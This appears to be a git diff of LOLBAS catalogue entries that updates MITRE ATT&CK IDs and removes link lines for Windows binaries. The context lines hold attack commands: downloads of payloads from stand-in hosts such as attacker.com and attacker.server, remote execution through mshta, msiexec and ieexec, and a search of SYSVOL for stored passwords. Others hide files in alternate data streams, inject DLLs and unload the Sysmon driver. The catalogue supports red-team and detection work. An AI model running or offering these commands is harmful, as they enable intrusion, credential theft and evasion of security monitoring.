|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml | ||||
|     Description: Search for stored password in Group Policy files stored on SYSVOL. | ||||
|     Usecase: Find credentials stored in cpassword attrbute | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1081 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1081 | ||||
|     MitreID: T1552.001 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1185 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1185 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105 | ||||
|     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\finger.exe | ||||
|   | ||||
| @@ -7,14 +7,13 @@ Commands: | ||||
|   - Command: fltMC.exe unload SysmonDrv | ||||
|     Description: Unloads a driver used by security agents | ||||
|     Usecase: Defense evasion | ||||
|     Category: ADS  | ||||
|     Category: ADS | ||||
|     Privileges: Admin | ||||
|     MitreID: T1562 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1562/002/ | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\fltMC.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: 4688 events with fltMC.exe | ||||
|   | ||||
| @@ -10,15 +10,13 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
|     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | ||||
|     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" | ||||
|     Description: Download | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\ftp.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Gpscript /startup | ||||
|     Description: Executes startup scripts configured in Group Policy | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\gpscript.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: Executes calc.exe with HTML Help. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\hh.exe | ||||
|   | ||||
| @@ -5,12 +5,11 @@ Author: 'Wade Hickey' | ||||
| Created: '2020-03-05' | ||||
| Commands: | ||||
|   - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw | ||||
|     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  | ||||
|     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\ie4uinit.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
|     OperatingSystem: Windows 10,7 | ||||
|   - Command: ilasm.exe C:\public\test.txt /dll | ||||
|     Description: Binary file used by .NET to compile c# code to dll | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1127/ | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     MitreID: T1218.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
| @@ -32,7 +30,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md | ||||
|   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: jsc.exe /t:library Library.js | ||||
|     Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Download and compresses the target file and stores it in the target file. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\makecab.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.013 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mavinject.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
|   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt | ||||
|     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
|   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt | ||||
|     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows 10S | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.014 | ||||
|     OperatingSystem: Windows 10 (and possibly earlier versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mmc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe | ||||
|     Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe | ||||
|     Description: Download file to machine and store it in Alternate Data Stream | ||||
|     Usecase: Hide downloaded data inton an Alternate Data Stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe project.csproj | ||||
|     Description: Build and execute a C# project stored in the target csproj file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe @sample.rsp | ||||
|     Description: Executes Logger statements from rsp file  | ||||
| @@ -42,8 +40,7 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10     | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
| @@ -52,7 +49,7 @@ Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection: | ||||
|  - IOC: Msbuild.exe should not normally be executed on workstations | ||||
| @@ -71,4 +68,4 @@ Acknowledgement: | ||||
|     Handle: '@Cneelis' | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
| --- | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\msconfig.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Msdt.exe | ||||
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
|     Description: Executes VBScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Description: Executes JavaScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe "C:\ads\file.txt:file.hta" | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code hidden in alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mshta.exe | ||||
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute custom made msi file with attack code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
|     Description: Installs the target remote & renamed .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code from remote server | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /y "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /z "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to un-register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\msiexec.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Proxy execution of .dll | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1128 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1128/ | ||||
|     MitreID: T1546.007 | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\WINDOWS\System32\Netsh.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: odbcconf /a {REGSVR c:\test\test.dll} | ||||
|     Description: Execute DllREgisterServer from DLL specified. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\odbcconf.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe' | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a \\server\payload.dll | ||||
|     Description: Open the target .DLL file with the Program Compatibilty Assistant. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
|     Description: Open the target .CPL file with the Program Compatibility Assistant. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
